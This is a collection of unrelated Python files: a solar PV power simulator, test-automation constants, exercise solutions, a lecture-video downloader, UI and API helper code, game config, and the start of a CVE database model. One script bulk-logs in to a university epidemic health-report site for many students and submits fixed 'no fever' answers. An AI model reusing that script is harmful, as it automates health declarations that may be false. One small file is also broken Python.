ssc.data_set_number(wfd, 'elev'.encode('utf-8'), self.meta_resource_data["Elevation"])
ssc.data_set_array(wfd, 'year'.encode('utf-8'), self.resource_data.Year)
ssc.data_set_array(wfd, 'month'.encode('utf-8'), self.resource_data.Month)
ssc.data_set_array(wfd, 'day'.encode('utf-8'), self.resource_data.Day)
ssc.data_set_array(wfd, 'hour'.encode('utf-8'), self.resource_data.Hour)
ssc.data_set_array(wfd, 'minute'.encode('utf-8'), self.resource_data.Minute)
ssc.data_set_array(wfd, 'dn'.encode('utf-8'), self.resource_data["{}DNI".format(clearsky_str)])
ssc.data_set_array(wfd, 'df'.encode('utf-8'), self.resource_data["{}DHI".format(clearsky_str)])
ssc.data_set_array(wfd, 'wspd'.encode('utf-8'), self.resource_data['Wind Speed'])
ssc.data_set_array(wfd, 'tdry'.encode('utf-8'), self.resource_data.Temperature)
# Create SAM compliant object
dat = ssc.data_create()
ssc.data_set_table(dat, 'solar_resource_data'.encode('utf-8'), wfd)
ssc.data_free(wfd)
# Specify the system Configuration
ssc.data_set_number(dat, 'system_capacity'.encode('utf-8'), capacity)
ssc.data_set_number(dat, 'dc_ac_ratio'.encode('utf-8'), DC_AC_ratio)
ssc.data_set_number(dat, 'tilt'.encode('utf-8'), tilt)
ssc.data_set_number(dat, 'azimuth'.encode('utf-8'), azimuth)
ssc.data_set_number(dat, 'inv_eff'.encode('utf-8'), inv_eff)
ssc.data_set_number(dat, 'losses'.encode('utf-8'), losses)
ssc.data_set_number(dat, 'array_type'.encode('utf-8'), array_type)
ssc.data_set_number(dat, 'gcr'.encode('utf-8'), 0.4) # Set ground coverage ratio
ssc.data_set_number(dat, 'adjust:constant'.encode('utf-8'), 0) # Set constant loss adjustment
# execute and put generation results back into dataframe
mod = ssc.module_create('pvwattsv5'.encode('utf-8'))
ssc.module_exec(mod, dat)
df=pd.DataFrame()
df['generation'] = np.array(ssc.data_get_array(dat, 'gen'.encode('utf-8')))
df.index = self.resource_data.index
# free the memory
ssc.data_free(dat)
ssc.module_free(mod)
self.cloud_type = self.resource_data['Cloud Type']
self.solar_power_from_nsrdb = df
self.capacity = capacity
return df
def generate_high_resolution_power_data(self, resolution, date):
""" Generate PV power time series.
Parameters
----------
resolution : string
Resolution of time series. Recommended values are "1S","30S","1min","5min". For more examples, see Pandas DateOffset objects
https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#dateoffset-objects
date : string
Date in YYYY-MM-DD format. For example "2015-07-14"
"""
ts = self.solar_power_from_nsrdb[date].resample("1S").interpolate(method="linear")
ts *= (7.5/self.capacity)
ct = self.cloud_type[date].resample("1S").pad()
σ = 0.0003447
λm = np.array([999999999, 999999999 , 3.2889645, 3.9044665, 3.2509495, 0, 4.1906035, 3.097432 , 4.088177,3.9044665,999999999,3.2889645,3.2889645])
λw = np.array([5.977229, 5.804869, 6.503102, 6.068099, 5.879129, 0, 4.834679, 5.153073, 6.661633,6.068099,5.977229,6.503102,6.503102])
pm = np.array([0.001250, 0.002803, 0.009683, 0.005502, 0.018888, 0, 0.000432, 0.007383, 0.003600,0.005502,0.001250,0.009683,0.009683])
pw = np.array([0.001941, 0.008969, 0.003452, 0.002801, 0.004097, 0, 0.001111, 0.004242, 0.008000,0.002801,0.001941,0.003452,0.003452])
df = ts[ts.values>0]
df["CloudType"] = ct[df.index]
M_hat = 600
N = len(df)
# N = 86400
hm = np.array([exp(-t**2/2)*cos(5*t) for t in np.linspace(-4,4,M_hat)])
hw = np.array([0.54-0.46*cos(2*pi*t/(M_hat-1)) for t in range(0,M_hat)]);
padding1 = np.zeros(N - M_hat, hm.dtype)
padding2 = np.zeros(N - M_hat - 1, hm.dtype)
first_col1 = np.r_[hm, padding1]
first_row1 = np.r_[hm[0], padding2]
first_col2 = np.r_[hw, padding1]
first_row2 = np.r_[hw[0], padding2]
Tm = linalg.toeplitz(first_col1, first_row1)
Tw = linalg.toeplitz(first_col2, first_row2)
zw = []
zm = []
η = np.zeros(N)
for i in range(0,N-M_hat):
if df["CloudType"].values[i]<2:
zm.append(0)
zw.append(0)
else:
zm.append(np.random.exponential(1/λm[df["CloudType"].values[i]]))
zw.append(np.random.exponential(1/λw[df["CloudType"].values[i]]))
zm = np.array(zm).reshape(-1,1)
zw = np.array(zw).reshape(-1,1)
randm = np.random.rand(len(zm))
randw = np.random.rand(len(zw))
bm = np.zeros(len(zm))
bw = np.zeros(len(zw))
for i in range(0,len(zm)):
if randm[i]>1-pm[df["CloudType"][i]]:
bm[i] = 1
if randm[i]>1-pw[df["CloudType"][i]]:
bw[i] = 1
boolean = df["CloudType"].values<2
η[boolean] = self.trunc_gauss(0,df.generation[boolean],df.generation[boolean],σ,sum(boolean))
generated_ts = df.generation.values.reshape(-1,1)+(abs(Tm))@(bm.reshape(-1,1)*zm)-Tw@(bw.reshape(-1,1)*zw)+η.reshape(-1,1)
ts["HighRes"] = 0.0
ts.loc[df.index,"HighRes"] = generated_ts.T[0]
ts.HighRes[ts.HighRes<0] = 0
ts.HighRes *= self.capacity/7.5
return pd.DataFrame(ts["HighRes"].resample(resolution).mean())
def trunc_gauss(self,a,b,mu,sigma,N):
u = np.random.rand(N)
alpha, beta = (a - mu)/sqrt(sigma), (b - mu)/sqrt(sigma)
before_inversion = norm.cdf(alpha) + u*(norm.cdf(beta)-norm.cdf(alpha))
x = norm.ppf(before_inversion)*sqrt(sigma)
return x
|
__author__ = 'shikun'
# 查找元素的方式
class GetVariable(object):
NAME = "name"
ID = "id"
XPATH = "xPath"
INDEX = "index"
find_element_by_id = "ID"
find_element_by_xpath = "XPath"
find_element_by_class_name = "ClassName"
find_element_by_name = "Name"
# 后面暂不支持
find_elements_by_id = "IDS"
find_elements_by_name = "by_names"
find_element_by_link_text = "by_link_text"
find_elements_by_link_text = "by_link_texts"
find_elements_by_xpath = "by_xpaths"
find_elements_by_class_name = "class_names"
SELENIUM = "selenium"
APPIUM = "appium"
ANDROID = "android"
IOS = "ios"
IE = "ie"
FOXFIRE = "foxfire"
CHROME = "chrome"
CLICK = "点击"
SWIPELEFT = "左滑"
SWIPERIGHT = "右滑"
SWIPETOP = "上滑"
SWIPEDOWN = "下滑"
SEND_KEYS = "输入"
BACK = "返回"
# 错误日志
ElementNotfound = 00
SendKeysError = 0o1
ClickError = 0o2
SwitchUiError = 0o3
SwipeError = 0o4
# assert
SkipError = 11
AppearError = 12
WAIT_TIME_LONG = 10
WAIT_TIME_SHORT = 5
# 断言
SKIP = "断言跳转"
APPEAR = "断言出现"
SWITCHUI = "切换界面"
#物理按键
KEYCODE_HOME = 3 #HOME建
KEYCODE_BACK = 4 #返回键
KEYCODE_ENTER = 66 #回车键
KEYCODE_ESCAPE = 111 #ESC键
|
# code
t = int(input())
for _ in range(t):
n = int(input())
temp = list(map(int, input().split()))
l = [temp[i:i+n] for i in range(0, len(temp), n)]
del temp
weight = 1
for i in range(n):
l.append(list(map(int, input().split(','))))
row = 0
col = 0
suml = 0
while True:
if row < n-1 and col < n-1:
a = min(l[row+1][col], l[row][col+1])
if a == l[row+1][col]:
row += 1
else:
col += 1
suml += a
if row == n-1 and col < n-1:
col += 1
a = l[row][col]
suml += a
if row < n-1 and col == n-1:
row += 1
a = l[row][col]
suml += a
if row == n-1 and col == n-1:
a = l[row][col]
suml += a
print(suml)
break
|
numero = int(input("Digite um número: "))
contador = 1
fatorial = 1
while contador <= numero:
fatorial = fatorial*contador
contador = contador + 1
print(fatorial) |
"""
PoliTO VL Downloader modules
Modules to download video-lessons from "Portale della didattica"
of Politecnico di Torino.
:copyright: (c) 2016, robymontyz
:license: BSD
Permission to use, copy, modify, and distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
import requests
import os.path
from bs4 import BeautifulSoup
def login(_username, _password):
"""
Login using Shibbolet.
:return: session object, correctly logged in (None if usr or psw are not correct).
"""
s = requests.session()
login_data = {
'j_username': _username,
'j_password': _password
}
s.get('https://login.didattica.polito.it/secure/ShibLogin.php') # set cookies
r = s.post('https://idp.polito.it/idp/Authn/X509Mixed/UserPasswordLogin', login_data)
soup = BeautifulSoup(r.content, 'lxml')
# check if login attributes are correct (searching for a specific span)
tag = soup.find('span', id="loginerror")
if tag is not None and tag.string == 'Errore al login. Verifica username e password':
return None
else:
# if correct:
tag = soup.find_all('input')
relay_state_value = tag[0]['value']
saml_response_value = tag[1]['value']
data = {
'RelayState': relay_state_value,
'SAMLResponse': saml_response_value
}
s.post('https://login.didattica.polito.it/Shibboleth.sso/SAML2/POST', data)
return s
def get_video_urls(s, _course_link):
"""
Get all the video-lessons URLs starting from the URL of any lesson
(first one is better).
:param s: session object
:param _course_link: URL of the lesson to start with
:return: a list with all the video-lessons URLs
"""
urls = []
lessons_list = []
# get relative path to every lessons scraping the HTML
page = s.get(_course_link)
soup = BeautifulSoup(page.content, 'lxml')
for link in soup.find('ul', id="navbar_left_menu").find_all('li', id=""):
for a in link.find_all("a"):
lessons_list.append(a.get('href'))
# get all the direct links to the videos (.mp4)
for lesson in lessons_list:
page = s.get('https://didattica.polito.it/portal/pls/portal/' + lesson)
soup = BeautifulSoup(page.content, 'lxml')
video_url = soup.find('source')['src']
urls.append(video_url)
return urls
def download_video(s, url, _dir):
"""
Download a video using the direct link
:param s: session object
:param url: direct link to a single video
:param _dir: download location
"""
r = s.get(url, stream=True)
filename = url.split('/')[-1].split('#')[0].split('?')[0]
with open(os.path.join(_dir, filename), 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
f.write(chunk)
return None
if __name__ == "__main__":
# use for testing
username = 'S012345'
password = 'password'
course_link = 'https://didattica.polito.it/portal/pls/portal/sviluppo.videolezioni.vis?cor=191&lez=8083'
dl_path = '/Users/foo/Downloads/CE/'
# session = login(username, password)
#
# urls = get_video_urls(session, course_link)
#
# for url in urls:
# print url
# # download_video(session, url, dl_path)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_new.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 600)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(50, 20, 91, 41))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_2.setGeometry(QtCore.QRect(160, 20, 101, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
self.textEdit.setGeometry(QtCore.QRect(300, 20, 111, 41))
self.textEdit.setObjectName("textEdit")
self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(20, 80, 741, 441))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setGeometry(QtCore.QRect(710, 20, 51, 23))
self.pushButton_3.setObjectName("pushButton_3")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 23))
self.menubar.setObjectName("menubar")
self.menu = QtWidgets.QMenu(self.menubar)
self.menu.setObjectName("menu")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.menubar.addAction(self.menu.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.pushButton.setText(_translate("MainWindow", "开始测量"))
self.pushButton_2.setText(_translate("MainWindow", "开始拟合"))
self.pushButton_3.setText(_translate("MainWindow", "设置"))
self.menu.setTitle(_translate("MainWindow", "光斑测量"))
|
class PyBill(object):
def __init__(self, salary):
self.__salary = salary
@property
def salary(self):
return self.__salary
|
from collections import OrderedDict
from uuid import uuid4
from rest_framework.exceptions import APIException, ValidationError
from rest_framework.status import (HTTP_400_BAD_REQUEST, HTTP_409_CONFLICT,
HTTP_404_NOT_FOUND)
from rest_framework.views import exception_handler
from .utils import get_status_title
class JsonApiValidationError(ValidationError):
def __init__(self, detail):
super(JsonApiValidationError, self).__init__({
'errors': [OrderedDict([
('status', self.status_code),
('title', get_status_title(self.status_code)),
('detail', error['detail']),
('source', error['source']),
]) for error in detail.get('errors', [])]
})
def render_exception(status_code, detail):
return {
'errors': [OrderedDict([
('id', str(uuid4())),
('status', status_code),
('title', get_status_title(status_code)),
('detail', detail)
])]
}
class JsonApiBadRequestError(APIException):
status_code = HTTP_400_BAD_REQUEST
default_detail = (u"The server cannot process the request due to invalid "
u"data.")
class JsonApiNotFoundError(APIException):
status_code = HTTP_404_NOT_FOUND
default_detail = u"Could not find the resource specified"
class JsonApiConflictError(APIException):
status_code = HTTP_409_CONFLICT
default_detail = u"The server cannot process the request due to a conflict."
class JsonApiFeatureNotAvailableError(JsonApiBadRequestError):
default_detail = u"This feature is not available for your project."
class JsonApiGeneralException(APIException):
def __init__(self, detail=None, status_code=None):
assert status_code is not None
self.status_code = status_code
super(JsonApiGeneralException, self).__init__(detail)
def jsonapi_exception_handler(exc, context):
accepts = context['request'].accepted_media_type or ''
if accepts.startswith('application/vnd.api+json'):
try:
exc.detail = render_exception(exc.status_code, exc.detail)
except AttributeError:
pass # Ignore django exceptions
response = exception_handler(exc, context)
return response
|
import requests
import time
from bs4 import BeautifulSoup
from openpyxl import load_workbook
import datetime
from email.mime.text import MIMEText
import smtplib
import random
import sys
import getopt
# 从xlsx文件中读取数据,未使用
def get_info_from_xlsx():
username = []
password = []
userEmail = []
wb = load_workbook(filename='config.xlsx')
sheetnames = wb.sheetnames
sheet = wb[sheetnames[0]]
row = wb[sheetnames[0]].max_row
for rowNum in range(1, row + 1):
# print(sheet.cell(row=rowNum, column=1).value)
username.append(sheet.cell(row=rowNum, column=1).value)
# print(sheet.cell(row=rowNum, column=2).value)
password.append(sheet.cell(row=rowNum, column=2).value)
# print(sheet.cell(row=rowNum, column=3).value)
userEmail.append(sheet.cell(row=rowNum, column=3).value)
sum = len(username)
return username, password, userEmail, sum
# 从txt文件中读取数据
def get_info_from_txt():
username = []
password = []
userEmail = []
name = []
sum = 0
configFile = open('config.txt', 'r', encoding='utf-8')
list = configFile.readlines()
# print(list)
for lists in list:
lists = lists.strip()
lists = lists.strip('\n')
lists = lists.strip(',')
lists = lists.split(',')
# print(lists[0])
username.append(lists[0])
# print(lists[1])
password.append(lists[1])
# print(lists[2])
userEmail.append(lists[2])
# print(lists[3])
name.append(lists[3])
sum += 1
# print('sum: ', sum)
return username, password, userEmail, name, sum
# 登录,为后续做准备
def login(s, headers, username, password):
login_url = 'http://yiqing.ctgu.edu.cn/wx/index/loginSubmit.do'
data = {
'username': '',
'password': '',
}
data['username'] = username
data['password'] = password
r = s.post(url=login_url, headers=headers, data=data)
# 增加等待时间,让数据接收完毕
time.sleep(20)
return r.text
# 获取要带有data的html
def get_student_info(s, headers):
student_info_url = 'http://yiqing.ctgu.edu.cn/wx/health/toApply.do'
r = s.get(url=student_info_url, headers=headers)
# print(r.text)
# 增加等待时间,让数据接收完毕
time.sleep(20)
return r.text
# 获取上报成功的html
def get_success_send_info(s, headers):
success_send_info_url = 'http://yiqing.ctgu.edu.cn/wx/health/main.do'
r = s.get(url=success_send_info_url, headers=headers)
# print(r.text)
time.sleep(30)
return r.text
# 解析html,获得data数据
def student_info_parse(html):
bs = BeautifulSoup(html, 'lxml')
data = {
'ttoken': bs.find(attrs={'name': 'ttoken'})['value'],
# 省份
'province': bs.find(attrs={'name': 'province'})['value'],
# 城市
'city': bs.find(attrs={'name': 'city'})['value'],
# 县区
'district': bs.find(attrs={'name': 'district'})['value'],
# 地区代码:身份证号前六位
'adcode': bs.find(attrs={'name': 'adcode'})['value'],
'longitude': bs.find(attrs={'name': 'longitude'})['value'],
'latitude': bs.find(attrs={'name': 'latitude'})['value'],
# 是否确诊新型肺炎
'sfqz': bs.find(attrs={'name': 'sfqz'})['value'],
# 是否疑似感染
'sfys': bs.find(attrs={'name': 'sfys'})['value'],
'sfzy': bs.find(attrs={'name': 'sfzy'})['value'],
# 是否隔离
'sfgl': bs.find(attrs={'name': 'sfgl'})['value'],
# 状态,statusName: "正常"
'status': bs.find(attrs={'name': 'status'})['value'],
'sfgr': bs.find(attrs={'name': 'sfgr'})['value'],
'szdz': bs.find(attrs={'name': 'szdz'})['value'],
# 手机号
'sjh': bs.find(attrs={'name': 'sjh'})['value'],
# 紧急联系人姓名
'lxrxm': bs.find(attrs={'name': 'lxrxm'})['value'],
# 紧急联系人手机号
'lxrsjh': bs.find(attrs={'name': 'lxrsjh'})['value'],
# 是否发热
'sffr': '否',
'sffy': '否',
'sfgr': '否',
'qzglsj': '',
'qzgldd': '',
'glyy': '',
'mqzz': '',
# 是否返校
'sffx': '否',
# 其它
'qt': '',
}
# print(data)
return data
# 解析html,获取success_send_info数据
def success_send_info_parse(html):
bs = BeautifulSoup(html, 'lxml')
text = bs.find('span', {"class": "normal-sm-tip green-warn fn-ml10"}).get_text()
# print(text)
return text
# 向服务器post数据
def sent_info(s, headers, data):
sent_info_url = 'http://yiqing.ctgu.edu.cn/wx/health/saveApply.do'
r = s.post(url=sent_info_url, headers=headers, data=data)
# print(r.text)
# 增加等待时间,让数据接收完毕
time.sleep(30)
print(r.status_code)
# 发邮件通知结果
def send_rusult(text, fromEmail, passworld, userEmail):
if userEmail == 'null':
print('用户指定不发送邮件')
return
# nowtime = datetime.datetime.now().strftime('%m-%d')
# msg_from = '' # 发送邮箱
msg_from = fromEmail
# passwd = '' # 密码
passwd = passworld
msg_to = userEmail # 目的邮箱
subject = '安全上报结果'
# content = text + '\n' + nowtime
content = text
msg = MIMEText(content)
msg['Subject'] = subject
msg['From'] = msg_from
msg['To'] = msg_to
s = smtplib.SMTP_SSL("smtp.qq.com", 465)
s.login(msg_from, passwd)
s.sendmail(msg_from, msg_to, msg.as_string())
print("邮件发送成功")
s.quit()
def parse_options(argv):
fromEmail = ''
pop3Key = ''
helpMsg = "send.py\n" \
"\tsend.py -f <fromEmail> -k <pop3Key>\n" \
"\t-f\t\t\t\t邮件发送方邮箱地址\n" \
"\t--fromEmail\n" \
"\t-k\t\t\t\t邮箱POP3授权码\n" \
"\t--pop3Key\n" \
"\t-h\t\t\t\thelp\n" \
"\t--help\n"
if not ((('-f' in argv) or ('--fromEmail' in argv)) and (('-k' in argv) or ('--pop3Key' in argv))):
print(helpMsg)
sys.exit()
argc = 0
if ('-h' in argv) or ('--help' in argv):
argc += 1
if ('-f' in argv) or ('--fromEmail' in argv):
argc += 2
if ('-f' in argv) or ('--fromEmail' in argv):
argc += 2
if len(argv) != argc:
print(helpMsg)
sys.exit()
try:
opts, args = getopt.getopt(argv, "hf:k:", ["help", "fromEmail=", "pop3Key="])
except getopt.GetoptError:
print(helpMsg)
sys.exit(2)
if not len(opts):
print(helpMsg)
sys.exit()
for option, value in opts:
if option in ("-h", "--help"):
print(helpMsg)
elif option in ("-f", "--fromEmail"):
if value is None:
sys.exit()
fromEmail = value
elif option in ("-k", "--pop3Key"):
if value is None:
sys.exit()
pop3Key = value
return fromEmail, pop3Key
def main(argv):
fromEmail, pop3Key = parse_options(argv)
username, password, userEmail, name, sum = get_info_from_txt()
# username, password, userEmail, sum = get_info_from_xlsx()
print('---------------------------')
print('账号密码读取成功,共', sum, '人')
print('---------------------------\n')
finished = 0
reported = 0
# 发送给用户的邮件信息
userString = []
# 发送给admin的邮件信息
adminString = []
adminString.append('---------------------------')
adminString.append('账号密码读取成功,共' + str(sum) + '人')
adminString.append('---------------------------' + '\n')
try:
for i in range(sum):
print('')
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Mobile Safari/537.36',
'Connection': 'close',
}
s = requests.session()
s.keep_alive = False
# print(s)
# print(headers)
state = login(s, headers, username[i], password[i])
if state == 'success':
print('用户', name[i], username[i], '登录成功')
# 记录用户登录成功,添加到userString和adminString
text = '用户 ' + str(name[i]) + str(username[i]) + '登录成功'
userString.append(text)
adminString.append(text)
else:
print('用户', name[i], username[i], '密码错误,登录失败')
# 记录用户登录失败,添加到userString和adminString
text = '用户 ' + str(name[i]) + str(username[i]) + '密码错误,登录失败'
userString.append(text)
adminString.append(text)
# 将登录失败信息 邮件发送给用户
send_rusult('\n'.join(userString), fromEmail, pop3Key, userEmail[i])
# 调用clear()方法,清空列表,避免其出现在下一个用户的邮件中
# print('userString:--------- : ', userString)
userString.clear()
continue
html = get_student_info(s, headers)
try:
data = student_info_parse(html)
sent_info(s, headers, data)
# 从网页中解析是否上报成功
html = get_success_send_info(s, headers)
msg = success_send_info_parse(html)
if msg == '今日已上报':
# 记录用户上报成功,添加到userString和adminString
text = '用户 ' + name[i] + '-' + str(username[i]) + ' 上报成功'
print(text)
userString.append(text)
adminString.append(text + '\n')
# print(userEmail[i])
# send_rusult(text, userEmail[i])
# 将用户上报成功信息,邮件发送给用户
send_rusult('\n'.join(userString), fromEmail, pop3Key, userEmail[i])
# 调用clear()方法,清空列表,避免其出现在下一个用户的邮件中
# print('userString:--------- : ', userString)
userString.clear()
# 本次上报人数和今日已上报人数统计
reported += 1
finished += 1
except:
# 从网页中解析是否上报成功
html = get_success_send_info(s, headers)
msg = success_send_info_parse(html)
if msg == '今日已上报':
text = '用户 ' + name[i] + '-' + str(username[i]) + ' 今日已上报'
print(text)
adminString.append(text + '\n')
# print(userEmail[i])
# send_rusult(text, userEmail[i])
# 今日已上报统计
reported += 1
# 调用clear()方法,清空列表,避免其出现在下一个用户的邮件中
# print('userString:--------- : ', userString)
userString.clear()
# 增大等待间隔,github访问速度慢
time.sleep(random.randint(20, 50))
# time.sleep(random.randint(1, 10))
finally:
text = '应报:' + str(sum) + ' 本次上报:' + str(finished) + ' 今日已上报:' + str(reported)
adminString.append('---------------------------')
adminString.append(text)
adminString.append('---------------------------')
# print('\n'.join(adminString))
print('---------------------------')
print(text)
# send_rusult(text, '管理员邮箱地址')
send_rusult('\n'.join(adminString), fromEmail, pop3Key, fromEmail)
print('---------------------------\n')
# 调用clear()方法,清空列表,避免其出现在下次的邮件中
# print('adminString:--------- : ', adminString)
userString.clear()
if __name__ == "__main__":
main(sys.argv[1:])
|
#!/usr/bin/env python3.5
f=open(r'/home/eaxu/workspace/Python_Scripts/somefile.txt','w')
f.write('Welcome to this file,There is nothing here expect.This is stupid to showing.')
f.close
f=open(r'/home/eaxu/workspace/Python_Scripts/somefile.txt')
print f.read()
f.close
|
from enum import Enum, auto
import tcod as libtcod
class GameStates(Enum):
PLAYERS_TURN = 1
ENEMY_TURN = 2
PLAYER_DEAD = 3
INVENTORY = 4
DROP_INVENTORY = 5
TARGETING = 6
LEVEL_UP = 7
CHARACTER_SCREEN = 8
SHOP = 9
INSTRUCTIONS = 10
class RenderOrder(Enum):
CORPSE = auto()
STAIRS = auto()
ITEM = auto()
ACTOR = auto()
class EquipmentSlots(Enum):
MAIN_HAND = auto()
OFF_HAND = auto()
CONFIG = {
"WIDTH" : 80,
"HEIGHT" : 55,
"MAP_WIDTH" : 80,
"MAP_HEIGHT" : 39,
"MAP_Y" : 4,
"TITLE" : "Dragons and Dungeons",
# UI - Upper Bar
"UPPER_BAR_HEIGHT" : 4,
# UI - HP Bar
"BAR_WIDTH" : 20,
"PANEL_HEIGHT" : 7,
"PANEL_Y" : 48, # height - panel_height
# UI - ACTION BAR
"ACTION_Y" : 43,
"ACTION_HEIGHT" : 5,
# UI - Message Log
# TODO: Find a way to compute these other than using hardcoded constants
"MESSAGE_X" : 22, # bar width +2
"MESSAGE_WIDTH" : 58, # width - bar_width - 2
"MESSAGE_HEIGHT" : 6, # panel_height - 1
# Procedural Generation
"ROOM_MAX_SIZE" : 10,
"ROOM_MIN_SIZE" : 6,
"MAX_ROOMS" : 30,
"MAX_MONSTERS" : 3,
"MAX_ITEMS" : 2,
# Render
"FONT_PATH" : "dejavu16x16_gs_tc.png",
# Field of View
"FOV_ALGORITHM" : 1,
"FOV_LIGHT_WALLS" : True,
"FOV_RADIUS" : 10,
"COLORS": {
'dark_wall': libtcod.Color(18, 18, 20),
'dark_ground': libtcod.Color(50, 50, 50),
'light_wall': libtcod.Color(130, 130, 130),
'light_ground': libtcod.Color(200, 200, 200),
'black': libtcod.Color(0, 0, 0)
}
}
|
# @Title: 插入区间 (Insert Interval)
# @Author: 2464512446@qq.com
# @Date: 2020-11-05 16:46:31
# @Runtime: 40 ms
# @Memory: 15 MB
class Solution:
def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:
left,right = newInterval
res =[]
flag = False
for li,ri in intervals:
if ri < left:
res.append([li,ri])
elif li > right:
if not flag:
res.append([left,right])
flag = True
res.append([li,ri])
else:
left = min(li,left)
right = max(ri,right)
if not flag:
res.append([left,right])
return res
|
import sys
import os
from collections import Counter
### my lib ####
sys.path.append('../')
from .converter.pdf2txt import pdf2txt
stop_words = [ ' am ', ' is ', ' of ', ' and ', ' the ', ' to ', ' it ', ' for ', ' in ', ' as ', ' or ', ' are ', ' be ', ' this ', ' that ', ' will ', ' there ', ' was ', ' a ']
def load_txt(path):
with open(path) as f:
text = f.readlines()
text = ''.join(text)
return text
def remove_stop_words(txt, stop_words):
for stop_word in stop_words:
txt = txt.replace(stop_word, ' ')
txt = txt.replace(' ', ' ')
return txt
def main():
path_list = ['..', 'plane_text']
path = os.path.join(*path_list)
print('analyze dir :', path)
dirs = os.listdir(path)
dirs.remove('.DS_Store')
for txt_path in dirs:
txt_path = os.path.join(*path_list, txt_path)
print(txt_path)
txt = load_txt(txt_path)
txt = txt.replace('-\n', '')
txt = txt.replace('\n', ' ')
txt = txt.lower()
txt = remove_stop_words(txt, stop_words)
txt_list = txt.split()
count = Counter(txt_list)
# print(count)
# with open(txt_path.replace('plane_text', 'analyze'), mode='w') as f:
# print('writing ... ', txt_path.replace('plane_txt', 'analyze'))
# f.write(txt)
if __name__ == '__main__':
main()
|
from random import random
from math import sqrt, atan2, degrees
class Point:
def __init__(self, uid, x, y):
self.id = uid
self.x = x + random() / 1e9
self.y = y + random() / 1e9
self.r = 0
self.theta = 0
def computePolar(self, center):
x = self.x - center.x
y = self.y - center.y
self.r = sqrt(x * x + y * y)
self.theta = degrees(atan2(y, x))
def solve():
data = list(map(int, input().split()))
n = data[0]
points = []
avg_x = 0
avg_y = 0
for i in range(1, 2 * n, 2):
x, y = data[i], data[i + 1]
points.append(Point(i // 2, x, y))
avg_x += points[-1].x
avg_y += points[-1].y
center = Point(-1, avg_x / n, avg_y / n)
for p in points:
p.computePolar(center)
points.sort(key=lambda p: -p.r)
points.sort(key=lambda p: p.theta)
print(" ".join([str(p.id) for p in points]))
if __name__ == "__main__":
cases = int(input())
for i in range(cases):
solve()
|
from os import environ
EXTERNAL_EMAIL_API = environ.get('EXTERNAL_EMAIL_API')
SENDGRID_API_KEY = environ.get('SENDGRID_API_KEY')
MAILGUN_API_KEY = environ.get('MAILGUN_API_KEY')
|
import datetime
from env_vars import db_uri
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import pandas as pd
db = SQLAlchemy()
def init_db(app=None):
if app is None:
# Create flask application for db to use app context
app = Flask(__name__)
db_config_dict = {
"pool_pre_ping": True,
"pool_size": 5,
# recycle connection after 3600 seconds (one hour)
"pool_recycle": 3600,
"pool_timeout": 30,
}
with app.app_context():
app.config["SQLALCHEMY_DATABASE_URI"] = db_uri
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config["SQLALCHEMY_ENGINE_OPTIONS"] = db_config_dict
db.init_app(app)
db.create_all()
class CVE(db.Model):
"""
JSON schema
- https://csrc.nist.gov/schema/nvd/feed/1.1/nvd_cve_feed_json_1.1.schema
This model represents a single CVE_Item from the json response of a query to the NVD CVE rest api.
Example query: https://services.nvd.nist.gov/rest/json/cve/1.0/CVE-2015-5611
Example model is derived from result["CVE_Items"][0]
- id = generated by SQLAlchemy
- cve_id = cve["CVE_data_meta"]["ID"]
- description = description["description_data"][0]["value"]
- cvss_v3_version = impact["baseMetricV3"]["cvssV3"]["version"]
- cvss_v3_vector_string = impact["baseMetricV3"]["cvssV3"]["vectorString"]
- cvss_v3_attack_vector = impact["baseMetricV3"]["cvssV3"]["attackVector"]
- cvss_v3_attack_complexity = impact["baseMetricV3"]["cvssV3"]["attackComplexity"]
